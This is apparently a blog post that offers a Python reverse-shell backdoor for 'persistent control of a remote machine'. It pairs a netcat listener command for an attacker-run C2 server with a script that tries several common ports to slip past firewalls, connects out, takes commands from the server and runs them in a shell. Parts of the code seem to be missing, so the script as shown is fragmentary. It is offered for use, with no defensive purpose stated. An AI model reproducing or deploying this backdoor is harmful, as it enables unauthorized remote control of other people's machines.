You never know when you'll need persistent control of a remote machine. The script below can typically be used in conjunction with a C2 server you control running the following: nc -nv -l -p 21
nc -h (-n=don't resolve hostnames, -v=verbose, -l=listen, -p=port)
Print statements have been commented out below for your convenience.
#!/user/bin/env python -tt
##BEGIN CONNECTION ROUTINE
#print "Starting Connection ..."
mysocket = socket.socket()
connected = False
##ATTEMPT TO CONNECT TO C2 SERVER
while not connected:
#FOR ATTEMPTING TO EVADE FIREWALL, REDUCE PORTS AS NECESSARY
for port in [21, 22, 80, 443]:
#print "Attempting Port:", port
##CHANGE IP BELOW TO YOUR C2 SERVER
#print "Not Able To Connect"
#print "Connection Successful"
connected = True
##WE ARE NOW CONNECTED
commandrequested = mysocket.recv(1024)
prochandle = subprocess.Popen(commandrequested, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
##ALLOW PROGRAM TO SAFELY WAIT FOR ABOVE PROCESS TO COMPLETE
results = prochandle.stdout.read() + prochandle.stderr.read()
1) send/recv have transfer limitations (~12k)
2) "cd" appears (it actually does) NOT to work as EACH command spawns a new shell
Post a Comment
Note: Only a member of this blog may post a comment.